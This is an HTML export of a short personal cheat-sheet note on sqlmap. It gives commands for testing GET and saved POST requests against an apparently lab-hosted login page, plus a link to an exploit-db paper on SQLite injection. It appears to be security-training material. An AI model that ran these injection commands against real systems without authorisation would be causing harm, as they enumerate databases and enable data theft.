<html>
  
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="../../../style.css">
    <base target="_parent">
    <title data-trilium-title>sqlmap</title>
  </head>
  
  <body>
    <div class="content">
       <h1 data-trilium-h1>sqlmap</h1>

      <div class="ck-content">
        <p><code>sqlmap --url "http://10.10.214.114/login.php?username=admin&amp;password=admin"  -p username --dbs</code> this
          works for get parameters in php files</p>
        <p>For POST paramters, catch post request in burp, save it and run with sqlmap</p>
        <p><code>sqlmap -r req.sql -p username --dbs</code>

        </p>
        <p><a href="https://www.exploit-db.com/docs/english/41397-injecting-sqlite-database-based-applications.pdf">https://www.exploit-db.com/docs/english/41397-injecting-sqlite-database-based-applications.pdf</a> </p>
        <p>to get updated data from sqlmap output when you change stuff in the site
          or db, use </p><pre><code class="language-text-plain">sqlmap --fresh-queries -r req.sql</code></pre>
      </div>
    </div>
  </body>

</html>